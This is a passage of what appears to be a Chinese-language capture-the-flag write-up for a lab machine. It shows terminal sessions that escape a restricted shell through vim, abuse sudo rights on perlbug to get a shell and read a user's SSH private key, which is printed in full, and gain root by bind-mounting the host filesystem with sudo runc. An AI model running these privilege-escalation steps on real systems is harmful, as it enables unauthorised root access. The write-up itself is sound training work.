dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:\nVIMRUNTIME=\/usr\/share\/vim\/vim81\nSSH_CONNECTION=172.20.10.8 38636 172.20.10.3 22\nVIM=\/usr\/share\/vim\nXDG_SESSION_CLASS=user\nTERM=xterm-256color\nUSER=morty\nSHLVL=2\nXDG_SESSION_ID=9\nXDG_RUNTIME_DIR=\/run\/user\/1001\nSSH_CLIENT=172.20.10.8 38636 22\nPATH=\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/games\nMAIL=\/var\/mail\/morty\nSSH_TTY=\/dev\/pts\/1\n_=\/usr\/bin\/printenv\nmorty@rick:~$ ls -la \/bin | grep bash\nmorty@rick:~$ ls -la \/usr\/local\/bin | grep bash\nmorty@rick:~$ ls -la \/usr\/bin | grep bash\n-rwxr-xr-x 1 root root 1302248 Apr 17 2019 bash\n-rwxr-xr-x 1 root root 6789 Apr 17 2019 bashbug\n-rwxr-xr-x 1 root root 2446 Feb 11 2019 dh_bash-completion\nlrwxrwxrwx 1 root root 4 Apr 17 2019 rbash -> bash<\/code><\/pre>\n\u53d1\u73b0\u8fd9\u4e2a\u6587\u4ef6\u8def\u5f84\u88ab\u79fb\u5230\u53e6\u4e00\u5904\u73af\u5883\u53d8\u91cf\u4e0a\u53bb\u4e86\uff1a<\/p>\n
morty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ vim -c ':!\/usr\/bin\/bash'\n\n\/bin\/rbash: \/usr\/bin\/bash: restricted: cannot specify `\/' in command names\n\nshell returned 1\n\nPress ENTER or type command to continue\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ vim -c ':!bash'\n\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash<\/code><\/pre>\n\u7a81\u7136\u53d1\u73b0\u4e0d\u53d7\u9650\u5236\u4e86\uff1a<\/p>\n
morty@rick:~$ ls -la\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Jul 16 03:26 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 morty morty 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24 2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24 2021 .gnupg\n-rw-r--r-- 1 rick rick 107 Nov 24 2021 .important\n-rw-r--r-- 1 morty morty 807 Nov 24 2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24 2021 .ssh\n-rw------- 1 morty morty 839 Jul 16 03:26 .viminfo\nmorty@rick:~$ cd \/\nmorty@rick:\/$<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
morty@rick:\/$ sudo -u rick \/usr\/bin\/perlbug -s 'x x x' -r x -c x -e 'exec \/bin\/bash;'\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: \n\nPlease pick a category from the following list:\n\n core docs install library utilities\n\nCategory [core]: \n\nPlease pick a severity from the following list:\n\n critical high medium low wishlist none\n\nSeverity [low]: \nrick@rick:\/$ whoami;id\nrick\nuid=1000(rick) gid=1000(rick) groups=1000(rick)<\/code><\/pre>\n\u63d0\u6743\u6210\u529f\uff01<\/p>\n
runc\u63d0\u6743root<\/h3>\nrick@rick:\/$ cd ~\nrick@rick:~$ ls -la\ntotal 36\ndrwxr-xr-x 5 rick rick 4096 Nov 24 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 rick rick 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 rick rick 3526 Nov 24 2021 .bashrc\ndrwx------ 3 rick rick 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 rick rick 4096 Nov 24 2021 .local\n-rw-r--r-- 1 rick rick 807 Nov 24 2021 .profile\ndrwx------ 2 rick rick 4096 Nov 24 2021 .ssh\n-rwx------ 1 rick rick 36 Nov 24 2021 user.txt\nrick@rick:~$ cat user.txt \na52d68b19ebca39c7b821ab1a51fef2e -\nrick@rick:~$ sudo -l\nMatching Defaults entries for rick on rick:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser rick may run the following commands on rick:\n (ALL : ALL) NOPASSWD: \/usr\/sbin\/runc\nrick@rick:~$ file \/usr\/sbin\/runc\n\/usr\/sbin\/runc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 3.2.0, Go BuildID=v9KnpAr_z7Yq7ynp0kxy\/Z0y3KsZB_zHn9j5Rprf6\/2kcKjaL8lQCM6nVR8R7u\/TV1B2Vmmo5gHdzqOJJ9i, BuildID[sha1]=8e109adbf7464ff1d68ad77a562737048d1a72fc, stripped\nrick@rick:~$ \/usr\/sbin\/runc\nNAME:\n runc - Open Container Initiative runtime\n\nrunc is a command line client for running applications packaged according to\nthe Open Container Initiative (OCI) format and is a compliant implementation of the\nOpen Container Initiative specification.\n\nrunc integrates well with existing process supervisors to provide a production\ncontainer runtime environment for applications. It can be used with your\nexisting process monitoring tools and the container will be spawned as a\ndirect child of the process supervisor.\n\nContainers are configured using bundles. A bundle for a container is a directory\nthat includes a specification file named "config.json" and a root filesystem.\nThe root filesystem contains the contents of the container.\n\nTo start a new instance of a container:\n\n # runc run [ -b bundle ] <container-id>\n\nWhere "<container-id>" is your name for the instance of the container that you\nare starting. The name you provide for the container instance must be unique on\nyour host. Providing the bundle directory using "-b" is optional. The default\nvalue for "bundle" is the current directory.\n\nUSAGE:\n runc [global options] command [command options] [arguments...]\n\nVERSION:\n 1.0.0~rc6+dfsg1\ncommit: 1.0.0~rc6+dfsg1-3\nspec: 1.0.1\n\nCOMMANDS:\n checkpoint checkpoint a running container\n create create a container\n delete delete any resources held by the container often used with detached container\n events display container events such as OOM notifications, cpu, memory, and IO usage statistics\n exec execute new process inside the container\n init initialize the namespaces and launch the process (do not call it outside of runc)\n kill kill sends the specified signal (default: SIGTERM) to the container's init process\n list lists containers started by runc with the given root\n pause pause suspends all processes inside the container\n ps ps displays the processes running inside a container\n restore restore a container from a previous checkpoint\n resume resumes all processes that have been previously paused\n run create and run a container\n spec create a new specification file\n start executes the user defined process in a created container\n state output the state of a container\n update update container resource constraints\n help, h Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n --debug enable debug output for logging\n --log value set the log file path where internal debug information is written (default: "\/dev\/null")\n --log-format value set the format used by logs ('text' (default), or 'json') (default: "text")\n --root value root directory for storage of container state (this should be located in tmpfs) (default: "\/run\/runc")\n --criu value path to the criu binary used for checkpoint and restore (default: "criu")\n --systemd-cgroup enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"\n --rootless value ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto")\n --help, -h show help\n --version, -v print the version<\/code><\/pre>\n\u627e\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u53d1\u73b0\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/runc-privilege-escalation<\/a><\/p>\n<\/div><\/p>\n\u770b\u4e00\u4e0b\uff1a<\/p>\n
runc -help #Get help and see if runc is intalled\nrunc spec #This will create the config.json file in your current folder\n\nInside the "mounts" section of the create config.json add the following lines:\n{\n "type": "bind",\n "source": "\/",\n "destination": "\/",\n "options": [\n "rbind",\n "rw",\n "rprivate"\n ]\n},\n\n#Once you have modified the config.json file, create the folder rootfs in the same directory\nmkdir rootfs\n\n# Finally, start the container\n# The root folder is the one from the host\nrunc run demo<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff0c\u5c06\u4ee3\u7801\u63d2\u5165config.json<\/code>\uff0c\u5c06\u6307\u5b9a\u4ee3\u7801\u6bb5\u63d2\u5165mount<\/code>\u4e0b\u4e00\u4e2a\u4f4d\u7f6e\uff1a<\/p>\nrick@rick:\/tmp$ diff config.json \/home\/rick\/config.json \n65,74d64\n< "type": "bind",\n< "source": "\/",\n< "destination": "\/",\n< "options": [\n< "rbind",\n< "rw",\n< "rprivate"\n< ]\n< },\n< {\n188c178\n< }\n---\n> }<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
rick@rick:\/tmp$ mkdir rootfs\nrick@rick:\/tmp$ sudo -l\nMatching Defaults entries for rick on rick:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser rick may run the following commands on rick:\n (ALL : ALL) NOPASSWD: \/usr\/sbin\/runc\nrick@rick:\/tmp$ sudo \/usr\/sbin\/runc run demo\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n\u6210\u529f\uff01<\/p>\n
\u5176\u4ed6\u6536\u83b7<\/h2>\nperlbug\u63d0\u6743\u65b9\u6848<\/h3>\n
perlbug<\/code>\u90a3\u91cc\u4e5f\u770b\u5230\u5e08\u5085\u91c7\u7528\u4ee5\u4e0b\u65b9\u6cd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\nmorty@rick:\/$ sudo -u rick \/usr\/bin\/perlbug -f \/home\/rick\/.ssh\/id_rsa\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nFirst of all, please provide a subject for the message.\nThis should be a concise description of your bug or problem\nwhich will help the volunteers working to improve perl to\ncategorize and resolve the issue. Be as specific and\ndescriptive as you can. A subject like "perl bug" or "perl\nproblem" will make it much less likely that your issue gets the\nattention it deserves.\n\nSubject: aaa a # \u5fc5\u987b\u5b58\u5728\u7a7a\u683c\nPerl's developers may need your email address to contact you for\nfurther information about your issue or to inform you when it is\nresolved. If the default shown is not your email address,\nplease correct it.\n\nYour address [rick@rick]: # \u4e00\u8def\u56de\u8f66\u4e00\u76f4\u5230Action\u7684\u65f6\u5019\u4f7f\u7528Display\u663e\u793a\u5c31\u884c\u4e86\uff01\n\n\/usr\/bin\/perlbug can send a copy of this report to your local\nperl administrator. If the address below is wrong, please\ncorrect it, or enter 'none' or 'yourself' to not send a copy.\n\nLocal perl administrator [root@localhost]: \n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: \n\nPlease pick a category from the following list:\n\n core docs install library utilities\n\nCategory [core]: \n\nPlease pick a severity from the following list:\n\n critical high medium low wishlist none\n\nSeverity [low]: \n\nYou have finished composing your message. At this point, you have \na few options. You can:\n\n * [Se]nd the message to perlbug@perl.org and root@localhost, \n * [D]isplay the message on the screen,\n * [R]e-edit the message\n * Display or change the message's [su]bject\n * Save the message to a [f]ile to mail at another time\n * [Q]uit without sending a message\n\nAction (Send\/Display\/Edit\/Subject\/Save to File): D\n\nThis is a bug report for perl from rick@rick,\ngenerated with the help of perlbug 1.41 running under perl 5.28.1.\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAw0gSyTcBji1NBL5\/yc1JVZMCEm8JMw7yH+pW+20XOM4\/TaozgiXe\neyMjoXXKbNhPHEUmW+B0Ot3ee4C5PG\/aUGyuCPW0VIGa0IBCuygjKCVG\/w6cKAjSPWakOM\n\/RFhqunKY+ZPvR\/4rklU4ekacV\/6ehNw9ti6O+UZIj0FoqNV1rYcC2xMwL2uV+dvHUnZA+\nFqEwvrmNR7ZFRUFJdQZdC99cW4ZpzP5ogdxVORS4+3Ac2D8vML2hzaOuVpUX3KBEsZWDrB\no56EN5v6mFqYA2c\/KsZ+Ot7EHAQly0MsSFYUk9zVIbe9LfKHNZfB9ngilRoRymOwoyPKDd\nq1MQg2PdIwAAA8jZ7Oin2ezopwAAAAdzc2gtcnNhAAABAQDDSBLJNwGOLU0Evn\/JzUlVkw\nISbwkzDvIf6lb7bRc4zj9NqjOCJd57IyOhdcps2E8cRSZb4HQ63d57gLk8b9pQbK4I9bRU\ngZrQgEK7KCMoJUb\/DpwoCNI9ZqQ4z9EWGq6cpj5k+9H\/iuSVTh6RpxX\/p6E3D22Lo75Rki\nPQWio1XWthwLbEzAva5X528dSdkD4WoTC+uY1HtkVFQUl1Bl0L31xbhmnM\/miB3FU5FLj7\ncBzYPy8wvaHNo65WlRfcoESxlYOsGjnoQ3m\/qYWpgDZz8qxn463sQcBCXLQyxIVhST3NUh\nt70t8oc1l8H2eCKVGhHKY7CjI8oN2rUxCDY90jAAAAAwEAAQAAAQBCgRYcvoXiFJ1pIzND\n14zE\/uayvmvEnq9onRb4U0OYTe0TFwapqRnml6X3w7SnctcmSopwubT7ozm0l7b91R3lS8\n3NMVgze1vs6\/FN6bJnZqKSFDisDa0DyiPdUTDktTuID7mqDHSM8ZE9I7iXY+7C\/SSTKsbk\nymPzRbC6sSo0t72jepvLUvs4QC+P4Y63qftzXezWXNU+BLqhHeMoqIOBGbA8xAcH+jXmko\n7SE7RV9QOjGj0I967VA6FVP3kshCjq4ETXP8pcyLKfq5HvlmbpqiKs6lsh2h4PLVaDfnZX\nxxXko4jckmLZ37ZbXQ4enK\/0lQNvUh0wJBWbaivHIEoBAAAAgHMlQR6cXJQe8rFmCu8Aru\n4kwKR3Egc7pMQYPGl7lQrX7o4osbcODFVXM96TL9cxxiy+yPQsbbUJ4yYUH5oeBh\/sUgAv\nFxKVrCpEV5loJ9\/FFQHx6DnhzDy5hixB+znnbliBsDkFIPlI8MFY70ZxBm5mTLN4OFVO\/J\nallMKzTL\/9AAAAgQD6rDTmCuPvEs5HVGFhRQwAbXCKA4zAQ9zkwfRid3Dlz6AkoIw7t7+q\nw8x+Q\/hiidhjtVY4K375Z5Ircmg\/b42t+iJs671Ob3ubgdF\/fQfzD8G4APxb2lZXmAIbJ6\nP1M9sb3z3ujNv\/UYcWRL+kwtnHLU9b3C6MRcXNkRTmQLBMIwAAAIEAx26CYkJJwx4ZlJG7\nCDCmbofgcFwdcm0iDiXzg1gQN2LRiYeQwtl13h0HUwts5geYDIuTXMTX+vDOB23aNdmHkR\niKmCCrcr4yX9NyCXa8BcYEyoY0eqMdtL4uWZTk67qHol0AMF+NLztzj4OiOV\/WE\/ayzlRh\nKlBx9Esbl5byuwEAAAAOcmlja0BzeW1mb25vczQBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n---\nFlags:\n category=core\n severity=low\n---\nSite configuration information for perl 5.28.1:\n\nConfigured by Debian at Tue Jul 21 19:27:00 UTC 2020.\n\nSummary of my perl5 (revision 5 version 28 subversion 1) configuration:\n\n Platform:\n osname=linux\n osvers=4.9.0\n archname=i686-linux-gnu-thread-multi-64int\n uname='linux localhost 4.9.0 #1 smp debian 4.9.0 i686 gnulinux '\n config_args='-Dusethreads -Duselargefiles -Dcc=i686-linux-gnu-gcc -Dcpp=i686-linux-gnu-cpp -Dld=i686-linux-gnu-gcc -Dccflags=-DDEBIAN -Wdate-time -D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=\/build\/perl-f1blUn\/perl-5.28.1=. -fstack-protector-strong -Wformat -Werror=format-security -Dldflags= -Wl,-z,relro -Dlddlflags=-shared -Wl,-z,relro -Dcccdlflags=-fPIC -Darchname=i686-linux-gnu -Dprefix=\/usr -Dprivlib=\/usr\/share\/perl\/5.28 -Darchlib=\/usr\/lib\/i386-linux-gnu\/perl\/5.28 -Dvendorprefix=\/usr -Dvendorlib=\/usr\/share\/perl5 -Dvendorarch=\/usr\/lib\/i386-linux-gnu\/perl5\/5.28 -Dsiteprefix=\/usr\/local -Dsitelib=\/usr\/local\/share\/perl\/5.28.1 -Dsitearch=\/usr\/local\/lib\/i386-linux-gnu\/perl\/5.28.1 -Dman1dir=\/usr\/share\/man\/man1 -Dman3dir=\/usr\/share\/man\/man3 -Dsiteman1dir=\/usr\/local\/man\/man1 -Dsiteman3dir=\/usr\/local\/man\/man3 -Duse64bitint -Dman1ext=1 -Dman3ext=3perl -Dpager=\/usr\/bin\/sensible-pager -Uafs\n-Ud_csh -Ud_ualarm -Uusesfio -Uusenm -Ui_libutil -Ui_xlocale -Uversiononly -DDEBUGGING=-g -Doptimize=-O2 -dEs -Duseshrplib -Dlibperl=libperl.so.5.28.1'\n hint=recommended\n useposix=true\n d_sigaction=define\n useithreads=define\n usemultiplicity=define\n use64bitint=define\n use64bitall=undef\n uselongdouble=undef\n usemymalloc=n\n default_inc_excludes_dot=define\n bincompat5005=undef\n Compiler:\n cc='i686-linux-gnu-gcc'\n ccflags ='-D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-strict-aliasing -pipe -I\/usr\/local\/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64'\n optimize='-O2 -g'\n cppflags='-D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-strict-aliasing -pipe -I\/usr\/local\/include'\n ccversion=''\n gccversion='8.3.0'\n gccosandvers=''\n intsize=4\n longsize=4\n ptrsize=4\n doublesize=8\n byteorder=12345678\n doublekind=3\n d_longlong=define\n longlongsize=8\n d_longdbl=define\n longdblsize=12\n longdblkind=3\n ivtype='long long'\n ivsize=8\n nvtype='double'\n nvsize=8\n Off_t='off_t'\n lseeksize=8\n alignbytes=4\n prototype=define\n Linker and Libraries:\n ld='i686-linux-gnu-gcc'\n ldflags =' -fstack-protector-strong -L\/usr\/local\/lib'\n libpth=\/usr\/local\/lib \/usr\/lib\/gcc\/i686-linux-gnu\/8\/include-fixed \/usr\/include\/i386-linux-gnu \/usr\/lib \/lib\/i386-linux-gnu \/lib\/..\/lib \/usr\/lib\/i386-linux-gnu \/usr\/lib\/..\/lib \/lib\n libs=-lgdbm -lgdbm_compat -ldb -ldl -lm -lpthread -lc -lcrypt\n perllibs=-ldl -lm -lpthread -lc -lcrypt\n libc=libc-2.28.so\n so=so\n useshrplib=true\n libperl=libperl.so.5.28\n gnulibc_version='2.28'\n Dynamic Linking:\n dlsrc=dl_dlopen.xs\n dlext=so\n d_dlsymun=undef\n ccdlflags='-Wl,-E'\n cccdlflags='-fPIC'\n lddlflags='-shared -L\/usr\/local\/lib -fstack-protector-strong'\n\nLocally applied patches:\n DEBPKG:debian\/cpan_definstalldirs - Provide a sensible INSTALLDIRS default for modules installed from CPAN.\n DEBPKG:debian\/db_file_ver - https:\/\/bugs.debian.org\/340047 Remove overly restrictive DB_File version check.\n DEBPKG:debian\/doc_info - Replace generic man(1) instructions with Debian-specific information.\n DEBPKG:debian\/enc2xs_inc - https:\/\/bugs.debian.org\/290336 Tweak enc2xs to follow symlinks and ignore missing @INC directories.\n DEBPKG:debian\/errno_ver - https:\/\/bugs.debian.org\/343351 Remove Errno version check due to upgrade problems with long-running processes.\n DEBPKG:debian\/libperl_embed_doc - https:\/\/bugs.debian.org\/186778 Note that libperl-dev package is required for embedded linking\n DEBPKG:fixes\/respect_umask - Respect umask during installation\n DEBPKG:debian\/writable_site_dirs - Set umask approproately for site install directories\n DEBPKG:debian\/extutils_set_libperl_path - EU:MM: set location of libperl.a under \/usr\/lib\n DEBPKG:debian\/no_packlist_perllocal - Don't install .packlist or perllocal.pod for perl or vendor\n DEBPKG:debian\/fakeroot - Postpone LD_LIBRARY_PATH evaluation to the binary targets.\n DEBPKG:debian\/instmodsh_doc - Debian policy doesn't install .packlist files for core or vendor.\n DEBPKG:debian\/ld_run_path - Remove standard libs from LD_RUN_PATH as per Debian policy.\n DEBPKG:debian\/libnet_config_path - Set location of libnet.cfg to \/etc\/perl\/Net as \/usr may not be writable.\n DEBPKG:debian\/perlivp - https:\/\/bugs.debian.org\/510895 Make perlivp skip include directories in \/usr\/local\n DEBPKG:debian\/squelch-locale-warnings - https:\/\/bugs.debian.org\/508764 Squelch locale warnings in Debian package maintainer scripts\n DEBPKG:debian\/patchlevel - https:\/\/bugs.debian.org\/567489 List packaged patches for 5.28.1-6+deb10u1 in patchlevel.h\n DEBPKG:fixes\/document_makemaker_ccflags - https:\/\/bugs.debian.org\/628522 [rt.cpan.org #68613] Document that CCFLAGS should include $Config{ccflags}\n DEBPKG:debian\/find_html2text - https:\/\/bugs.debian.org\/640479 Configure CPAN::Distribution with correct name of html2text\n DEBPKG:debian\/perl5db-x-terminal-emulator.patch - https:\/\/bugs.debian.org\/668490 Invoke x-terminal-emulator rather than xterm in perl5db.pl\n DEBPKG:debian\/cpan-missing-site-dirs - https:\/\/bugs.debian.org\/688842 Fix CPAN::FirstTime defaults with nonexisting site dirs if a parent is writable\n DEBPKG:fixes\/memoize_storable_nstore - [rt.cpan.org #77790] https:\/\/bugs.debian.org\/587650 Memoize::Storable: respect 'nstore' option not respected\n DEBPKG:debian\/makemaker-pasthru - https:\/\/bugs.debian.org\/758471 Pass LD settings through to subdirectories\n DEBPKG:debian\/makemaker-manext - https:\/\/bugs.debian.org\/247370 Make EU::MakeMaker honour MANnEXT settings in generated manpage headers\n DEBPKG:debian\/kfreebsd-softupdates - https:\/\/bugs.debian.org\/796798 Work around Debian Bug#796798\n DEBPKG:fixes\/autodie-scope - https:\/\/bugs.debian.org\/798096 Fix a scoping issue with "no autodie" and the "system" sub\n DEBPKG:fixes\/memoize-pod - [rt.cpan.org #89441] Fix POD errors in Memoize\n DEBPKG:debian\/hurd-softupdates - https:\/\/bugs.debian.org\/822735 Fix t\/op\/stat.t failures on hurd\n DEBPKG:fixes\/math_complex_doc_great_circle - https:\/\/bugs.debian.org\/697567 [rt.cpan.org #114104] Math::Trig: clarify definition of great_circle_midpoint\n DEBPKG:fixes\/math_complex_doc_see_also - https:\/\/bugs.debian.org\/697568 [rt.cpan.org #114105] Math::Trig: add missing SEE ALSO\n DEBPKG:fixes\/math_complex_doc_angle_units - https:\/\/bugs.debian.org\/731505 [rt.cpan.org #114106] Math::Trig: document angle units\n DEBPKG:fixes\/cpan_web_link - https:\/\/bugs.debian.org\/367291 CPAN: Add link to main CPAN web site\n DEBPKG:debian\/hppa_op_optimize_workaround - https:\/\/bugs.debian.org\/838613 Temporarily lower the optimization of op.c on hppa due to gcc-6 problems\n DEBPKG:debian\/installman-utf8 - https:\/\/bugs.debian.org\/840211 Generate man pages with UTF-8 characters\n DEBPKG:fixes\/getopt-long-4 - https:\/\/bugs.debian.org\/864544 [rt.cpan.org #122068] Fix issue #122068.\n DEBPKG:debian\/hppa_opmini_optimize_workaround - https:\/\/bugs.debian.org\/869122 Lower the optimization level of opmini.c on hppa\n DEBPKG:debian\/sh4_op_optimize_workaround - https:\/\/bugs.debian.org\/869373 Also lower the optimization level of op.c and opmini.c on sh4\n DEBPKG:debian\/perldoc-pager - https:\/\/bugs.debian.org\/870340 [rt.cpan.org #120229] Fix perldoc terminal escapes when sensible-pager is less\n DEBPKG:debian\/prune_libs - https:\/\/bugs.debian.org\/128355 Prune the list of libraries wanted to what we actually need.\n DEBPKG:debian\/mod_paths - Tweak @INC ordering for Debian\n DEBPKG:debian\/configure-regen - https:\/\/bugs.debian.org\/762638 Regenerate Configure et al. after probe unit changes\n DEBPKG:debian\/deprecate-with-apt - https:\/\/bugs.debian.org\/747628 Point users to Debian packages of deprecated core modules\n DEBPKG:debian\/disable-stack-check - https:\/\/bugs.debian.org\/902779 [perl #133327] Disable debugperl stack extension checks for binary compatibility with perl\n DEBPKG:debian\/gdbm-fatal - [perl #133295] https:\/\/bugs.debian.org\/904005 Temporarily skip GDBM_File fatal.t for gdbm >= 1.15 compatibility\n DEBPKG:fixes\/storable-recursion - https:\/\/bugs.debian.org\/912900 [perl #133326] [120060c] (perl #133326) fix and clarify handling of recurs_sv.\n DEBPKG:fixes\/caretx-fallback - https:\/\/bugs.debian.org\/913347 [perl #133573] [03b94aa] RT#133573: $^X fallback when platform-specific technique fails\n DEBPKG:fixes\/eumm-usrmerge - https:\/\/bugs.debian.org\/913637 Avoid mangling \/bin non-perl shebangs on merged-\/usr systems\n DEBPKG:fixes\/errno-include-path - [6c5080f] [perl #133662] https:\/\/bugs.debian.org\/875921 Make Errno_pm.PL compatible with \/usr\/include\/<ARCH>\/errno.h\n DEBPKG:fixes\/kfreebsd-renameat - [a3c63a9] https:\/\/bugs.debian.org\/912521 [perl #133668] Also work around renameat() kernel bug on GNU\/kFreeBSD\n DEBPKG:fixes\/time-local-2020 - https:\/\/bugs.debian.org\/915209 [rt.cpan.org #124787] Fix Time::Local tests\n DEBPKG:fixes\/inplace-editing-bugfix\/part1 - https:\/\/bugs.debian.org\/914651 (perl #133659) move argvout cleanup to a new function\n DEBPKG:fixes\/inplace-editing-bugfix\/part2 - https:\/\/bugs.debian.org\/914651 (perl #133659) tests for global destruction handling of inplace editing\n DEBPKG:fixes\/inplace-editing-bugfix\/part3 - https:\/\/bugs.debian.org\/914651 (perl #133659) make an in-place edit successful if the exit status is zero\n DEBPKG:fixes\/fix-manifest-failures - https:\/\/bugs.debian.org\/914962 Fix t\/porting\/manifest.t failures when run in a foreign git checkout\n DEBPKG:fixes\/pipe-open-bugfix\/part1 - [perl #133726] https:\/\/bugs.debian.org\/916313 Always mark pipe in pipe-open as inherit-on-exec\n DEBPKG:fixes\/pipe-open-bugfix\/part2 - [perl #133726] https:\/\/bugs.debian.org\/916313 Always mark pipe in list pipe-open as inherit-on-exec\n DEBPKG:fixes\/storable-probing\/prereq1 - [3f4cad1] Storable: fix for strawberry build failures:\n DEBPKG:fixes\/storable-probing\/prereq2 - [perl #133411] [edf639f] (perl #133411) don't try to load Storable with -Dusecrosscompile\n DEBPKG:fixes\/storable-probing\/disable-probing - https:\/\/bugs.debian.org\/914133 [perl #133708] [2a0bbd3] (perl #133708) remove build-time probing for stack limits for Storable\n DEBPKG:debian\/perlbug-editor - https:\/\/bugs.debian.org\/922609 Use "editor" as the default perlbug editor, as per Debian policy\n DEBPKG:fixes\/posix-mbrlen - [25d7b7a] https:\/\/bugs.debian.org\/924517 [perl #133928] Fix POSIX::mblen mbstate_t initialization on threaded perls with glibc\n DEBPKG:fixes\/CVE-2020-10543 - https:\/\/bugs.debian.org\/962005 regcomp.c: Prevent integer overflow from nested regex quantifiers.\n DEBPKG:fixes\/CVE-2020-10878 - https:\/\/bugs.debian.org\/962005 study_chunk: extract rck_elide_nothing\n DEBPKG:fixes\/CVE-2020-12723 - https:\/\/bugs.debian.org\/962005 study_chunk: avoid mutating regexp program within GOSUB\n DEBPKG:fixes\/io-socket-ip-nov4 - https:\/\/bugs.debian.org\/962019 Fix test failures in IO::Socket::IP with an IPv6-only host\n\n---\n@INC for perl 5.28.1:\n \/etc\/perl\n \/usr\/local\/lib\/i386-linux-gnu\/perl\/5.28.1\n \/usr\/local\/share\/perl\/5.28.1\n \/usr\/lib\/i386-linux-gnu\/perl5\/5.28\n \/usr\/share\/perl5\n \/usr\/lib\/i386-linux-gnu\/perl\/5.28\n \/usr\/share\/perl\/5.28\n \/usr\/local\/lib\/site_perl\n \/usr\/lib\/i386-linux-gnu\/perl-base\n\n---\nEnvironment for perl 5.28.1:\n HOME=\/home\/rick\n LANG=en_US.UTF-8\n LANGUAGE (unset)\n LD_LIBRARY_PATH (unset)\n LOGDIR (unset)\n PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n PERL_BADLANG (unset)\n SHELL=\/bin\/bash\n\nYou have finished composing your message. At this point, you have \na few options. You can:\n\n * [Se]nd the message to perlbug@perl.org and root@localhost, \n * [D]isplay the message on the screen,\n * [R]e-edit the message\n * Display or change the message's [su]bject\n * Save the message to a [f]ile to mail at another time\n * [Q]uit without sending a message\n\nAction (Send\/Display\/Edit\/Subject\/Save to File): <\/code><\/pre>\n\u63d0\u6743root\u65b9\u6848\u4fee\u6b63<\/h3>\n
\u867d\u7136\u8fdb\u5165\u4e86rootshell\uff0c\u4f46\u662f\u53ea\u662f\u53ea\u8bfb\u6587\u4ef6\u7cfb\u7edf\uff0c\u53c2\u8003wp1\u4e2d\uff0crpj7\u6307\u51fa\uff0c\u53ea\u8981\u4fee\u6539\u4e00\u4e2a\u5185\u5bb9\u5c31\u53ef\u4ee5\u4f7f\u4e4b\u53d8\u4e3a\u53ef\u5199\u7684!<\/p>\n
